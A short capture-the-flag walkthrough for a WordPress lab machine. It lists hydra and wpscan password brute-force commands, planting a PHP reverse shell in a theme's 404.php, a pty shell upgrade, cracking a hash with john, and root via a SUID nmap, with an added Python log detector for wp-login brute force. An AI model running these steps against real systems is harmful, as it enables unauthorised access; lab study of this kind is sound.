See the video for some of the details.
Link:
https://www.bilibili.com/video/BV12d4y1G71K
The target machine is available on TryHackMe or VulnHub.
For how to download and install it, see DC-1.
Information gathering
nmap -sP 192.168.92.0/24
nmap 192.168.92.131
wpscan --url ip
wp 4.3.1
http://10.10.37.114/robots.txt
Got flag1
http://10.10.37.114/fsocity.tic
Brute force
hydra -l Elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64
hydra -vV -l elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
wpscan --url http://10.10.37.114/ -U Elliot -P ./1.txt --api-token <YOUR_WPSCAN_API_TOKEN>
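From the defender's side, the password guessing above shows up in the web server access log as a burst of POSTs to /wp-login.php. The following detector is an added example, not part of the original walkthrough. It assumes the combined log format and that WordPress answers a failed login with 200 and a successful one with 302; the sample log lines and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (combined log format); IPs and times are made up.
_ROW = '{ip} - - [01/Jan/2024:10:{t} +0000] "{req} HTTP/1.1" {st} 0 "-" "Mozilla/5.0"'
SAMPLE_LOG = "\n".join(
    # six failed guesses one second apart, then a successful login
    [_ROW.format(ip="192.168.92.128", t=f"00:{s:02d}", req="POST /wp-login.php", st=200)
     for s in range(6)]
    + [_ROW.format(ip="192.168.92.128", t="00:06", req="POST /wp-login.php", st=302),
       # an ordinary user: one mistyped password, then a normal login
       _ROW.format(ip="192.168.92.1", t="01:00", req="POST /wp-login.php", st=200),
       _ROW.format(ip="192.168.92.1", t="01:20", req="POST /wp-login.php", st=302),
       _ROW.format(ip="192.168.92.1", t="01:25", req="GET /wp-admin/", st=200)])

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def detect_wp_login_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failed wp-login POSTs inside a sliding window.

    Returns {ip: {"failures": peak count in window, "success_after": bool}};
    success_after means a 302 followed the burst (a password was likely guessed).
    """
    recent = defaultdict(list)   # ip -> timestamps of failures still inside the window
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["status"] == "200":          # login form re-rendered: failed attempt
            recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
            if len(recent[ip]) >= threshold:
                hit = findings.setdefault(ip, {"failures": 0, "success_after": False})
                hit["failures"] = max(hit["failures"], len(recent[ip]))
        elif m["status"] == "302" and ip in findings:   # redirect: login succeeded
            findings[ip]["success_after"] = True
    return findings

if __name__ == "__main__":
    for ip, info in detect_wp_login_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```
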
Getting a shell
find / -name php-reverse-shell.php
Copy and paste its contents into 404.php
Got flag2
python -c 'import pty; pty.spawn("/bin/bash")'
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt 6.txt --fork=10
Privilege escalation
find / -user root -perm -4000 2>/dev/null
nmap --interactive
!sh
Got root privileges
Got flag3